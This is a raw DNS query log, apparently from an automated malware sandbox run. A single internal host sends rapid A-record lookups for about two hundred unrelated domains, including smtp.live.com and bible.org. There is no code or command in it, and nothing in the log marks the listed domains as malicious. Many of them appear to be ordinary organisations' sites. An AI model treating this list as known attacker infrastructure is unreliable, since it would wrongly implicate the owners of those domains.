                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.857171059 CET192.168.2.58.8.8.80x2febStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.857487917 CET192.168.2.58.8.8.80xab23Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.897672892 CET192.168.2.58.8.8.80x953cStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.903970957 CET192.168.2.58.8.8.80xa25bStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.906857014 CET192.168.2.58.8.8.80x54cfStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.909409046 CET192.168.2.58.8.8.80xe7eaStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.920298100 CET192.168.2.58.8.8.80x753Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.928873062 CET192.168.2.58.8.8.80xf926Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.936616898 CET192.168.2.58.8.8.80x3faStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.938358068 CET192.168.2.58.8.8.80x7211Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.938358068 CET192.168.2.58.8.8.80x1fc8Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.940398932 CET192.168.2.58.8.8.80xa0ceStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.961982965 CET192.168.2.58.8.8.80xe78aStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.969415903 CET192.168.2.58.8.8.80xd6fStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.973052025 CET192.168.2.58.8.8.80x1019Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.985577106 CET192.168.2.58.8.8.80xc25bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.988024950 CET192.168.2.58.8.8.80x4d6cStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.990477085 CET192.168.2.58.8.8.80xb1dbStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.994590044 CET192.168.2.58.8.8.80x2185Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.015851021 CET192.168.2.58.8.8.80x6ff2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.018907070 CET192.168.2.58.8.8.80x7f4dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.023530006 CET192.168.2.58.8.8.80x4dd9Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.038392067 CET192.168.2.58.8.8.80x2f3eStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.038393021 CET192.168.2.58.8.8.80xf7f2Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.059370041 CET192.168.2.58.8.8.80xba8Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.108463049 CET192.168.2.58.8.8.80x26bcStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.272381067 CET192.168.2.58.8.8.80x4032Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.280913115 CET192.168.2.58.8.8.80x7d2eStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.432620049 CET192.168.2.58.8.8.80x26e6Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.437804937 CET192.168.2.58.8.8.80x4f4Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.441209078 CET192.168.2.58.8.8.80xa91eStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.446079016 CET192.168.2.58.8.8.80xd135Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.450999975 CET192.168.2.58.8.8.80x9970Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.467351913 CET192.168.2.58.8.8.80xd8e5Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.532002926 CET192.168.2.58.8.8.80x26e6Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.645339012 CET192.168.2.58.8.8.80x5907Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.744935036 CET192.168.2.58.8.8.80xaf6Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.753216028 CET192.168.2.58.8.8.80xc2ecStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.762128115 CET192.168.2.58.8.8.80x6e5Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.763314009 CET192.168.2.58.8.8.80xdb13Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.782043934 CET192.168.2.58.8.8.80x88edStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.818067074 CET192.168.2.58.8.8.80xc597Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.822753906 CET192.168.2.58.8.8.80x73fcStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.826973915 CET192.168.2.58.8.8.80xff9dStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.846102953 CET192.168.2.58.8.8.80x7578Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.863964081 CET192.168.2.58.8.8.80xa2f3Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.878081083 CET192.168.2.58.8.8.80xbda9Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.889604092 CET192.168.2.58.8.8.80x93cbStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.894344091 CET192.168.2.58.8.8.80xd174Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.897919893 CET192.168.2.58.8.8.80xbd07Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.908313036 CET192.168.2.58.8.8.80xda5Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.908313036 CET192.168.2.58.8.8.80x4ad3Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.911367893 CET192.168.2.58.8.8.80xd1dbStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.913252115 CET192.168.2.58.8.8.80x44a9Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.921586990 CET192.168.2.58.8.8.80x1093Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.926717997 CET192.168.2.58.8.8.80x1cf2Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.927094936 CET192.168.2.58.8.8.80xb117Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.929708958 CET192.168.2.58.8.8.80xcc77Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.932890892 CET192.168.2.58.8.8.80x1078Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.932890892 CET192.168.2.58.8.8.80x9518Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.932991028 CET192.168.2.58.8.8.80x2492Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.940256119 CET192.168.2.58.8.8.80x8f9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.942714930 CET192.168.2.58.8.8.80xfbd5Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.942714930 CET192.168.2.58.8.8.80x80e4Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.954303980 CET192.168.2.58.8.8.80x4f0Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.965827942 CET192.168.2.58.8.8.80xf253Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.984002113 CET192.168.2.58.8.8.80x92d6Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.009732008 CET192.168.2.58.8.8.80x3099Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.013025999 CET192.168.2.58.8.8.80x29a1Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.106609106 CET192.168.2.58.8.8.80x88d1Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.126537085 CET192.168.2.58.8.8.80xcbc0Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.133531094 CET192.168.2.58.8.8.80x94d9Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.249295950 CET192.168.2.58.8.8.80x56dfStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.452265978 CET192.168.2.58.8.8.80x6050Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.562608004 CET192.168.2.58.8.8.80x2a1aStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.680022001 CET192.168.2.58.8.8.80xdfc7Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.686743021 CET192.168.2.58.8.8.80xaf21Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.811669111 CET192.168.2.58.8.8.80xc597Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.883124113 CET192.168.2.58.8.8.80x6e7eStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.928904057 CET192.168.2.58.8.8.80x5bf6Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.933209896 CET192.168.2.58.8.8.80xdf68Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.960875988 CET192.168.2.58.8.8.80x7f1eStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.996857882 CET192.168.2.58.8.8.80x729Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.043180943 CET192.168.2.58.8.8.80xeac6Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.046837091 CET192.168.2.58.8.8.80xae40Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.130619049 CET192.168.2.58.8.8.80x9b10Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.184782028 CET192.168.2.58.8.8.80x2caStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.185345888 CET192.168.2.58.8.8.80x862dStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.187760115 CET192.168.2.58.8.8.80xaf77Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.208018064 CET192.168.2.58.8.8.80x8f8eStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.269277096 CET192.168.2.58.8.8.80xc247Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.275177956 CET192.168.2.58.8.8.80x1c6Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.313760996 CET192.168.2.58.8.8.80x3e38Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.369755983 CET192.168.2.58.8.8.80xac31Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.399143934 CET192.168.2.58.8.8.80x3767Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.423993111 CET192.168.2.58.8.8.80x9ce6Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.449363947 CET192.168.2.58.8.8.80x90feStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.469028950 CET192.168.2.58.8.8.80x1df0Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.477597952 CET192.168.2.58.8.8.80x8438Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.577265978 CET192.168.2.58.8.8.80xa858Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.600234032 CET192.168.2.58.8.8.80x6517Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.680665970 CET192.168.2.58.8.8.80x82a4Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.719036102 CET192.168.2.58.8.8.80x99e1Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.798968077 CET192.168.2.58.8.8.80xf585Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.834645033 CET192.168.2.58.8.8.80xeb23Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.859230995 CET192.168.2.58.8.8.80xc597Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.959515095 CET192.168.2.58.8.8.80xa1a1Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.992079020 CET192.168.2.58.8.8.80x9532Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.047463894 CET192.168.2.58.8.8.80x1655Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.054357052 CET192.168.2.58.8.8.80xa979Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.059242010 CET192.168.2.58.8.8.80x4711Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.064707994 CET192.168.2.58.8.8.80xf460Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.084424973 CET192.168.2.58.8.8.80xabecStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.093924046 CET192.168.2.58.8.8.80x477fStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.097729921 CET192.168.2.58.8.8.80x5cc9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.114367008 CET192.168.2.58.8.8.80xc89fStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.199843884 CET192.168.2.58.8.8.80x470aStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.217631102 CET192.168.2.58.8.8.80x46dfStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.238842964 CET192.168.2.58.8.8.80xc19eStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.285934925 CET192.168.2.58.8.8.80xdc42Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.313077927 CET192.168.2.58.8.8.80xbe70Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.339276075 CET192.168.2.58.8.8.80x4884Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.377628088 CET192.168.2.58.8.8.80x57e3Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.467891932 CET192.168.2.58.8.8.80x93daStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.627264023 CET192.168.2.58.8.8.80x7fa6Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.651916027 CET192.168.2.58.8.8.80xd102Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.677875996 CET192.168.2.58.8.8.80xa988Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.707740068 CET192.168.2.58.8.8.80xe039Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.733424902 CET192.168.2.58.8.8.80x9c57Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.736337900 CET192.168.2.58.8.8.80xd00fStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.775916100 CET192.168.2.58.8.8.80xcc38Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.799140930 CET192.168.2.58.8.8.80xe597Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.817677021 CET192.168.2.58.8.8.80x81efStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.858712912 CET192.168.2.58.8.8.80xb496Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.865115881 CET192.168.2.58.8.8.80x271aStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.912041903 CET192.168.2.58.8.8.80xc3b4Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.103538036 CET192.168.2.58.8.8.80xfba3Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.115839005 CET192.168.2.58.8.8.80xe3b4Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.137855053 CET192.168.2.58.8.8.80xb153Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.170063972 CET192.168.2.58.8.8.80x14edStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.210733891 CET192.168.2.58.8.8.80x133eStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.219316959 CET192.168.2.58.8.8.80xa0b5Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.257121086 CET192.168.2.58.8.8.80x799aStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.263880968 CET192.168.2.58.8.8.80x4294Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.284876108 CET192.168.2.58.8.8.80xe77dStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.310645103 CET192.168.2.58.8.8.80x6dd0Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.385494947 CET192.168.2.58.8.8.80x323Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.412858009 CET192.168.2.58.8.8.80x292dStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.501882076 CET192.168.2.58.8.8.80x3111Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.537004948 CET192.168.2.58.8.8.80xa3b8Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.556700945 CET192.168.2.58.8.8.80x370eStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.630070925 CET192.168.2.58.8.8.80xcce2Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.656383038 CET192.168.2.58.8.8.80xad11Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.683291912 CET192.168.2.58.8.8.80x3447Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.729510069 CET192.168.2.58.8.8.80xe053Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.730278969 CET192.168.2.58.8.8.80x3178Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.826796055 CET192.168.2.58.8.8.80x3190Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.870126963 CET192.168.2.58.8.8.80x123bStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.875816107 CET192.168.2.58.8.8.80xc597Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.877396107 CET192.168.2.58.8.8.80x4631Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.968146086 CET192.168.2.58.8.8.80xd3f9Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.972182989 CET192.168.2.58.8.8.80x4922Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.057796001 CET192.168.2.58.8.8.80xb0f4Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.103410006 CET192.168.2.58.8.8.80xb5c7Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.211414099 CET192.168.2.58.8.8.80xdc3bStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.269639015 CET192.168.2.58.8.8.80xccdbStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.317806959 CET192.168.2.58.8.8.80x5f6aStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.380006075 CET192.168.2.58.8.8.80xc2cdStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.381515980 CET192.168.2.58.8.8.80xeeb1Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.429800034 CET192.168.2.58.8.8.80x4fd6Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.478615046 CET192.168.2.58.8.8.80xb66bStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.507416964 CET192.168.2.58.8.8.80x4432Standard query (0)e-kami.netA (IP address)IN (0x0001)false
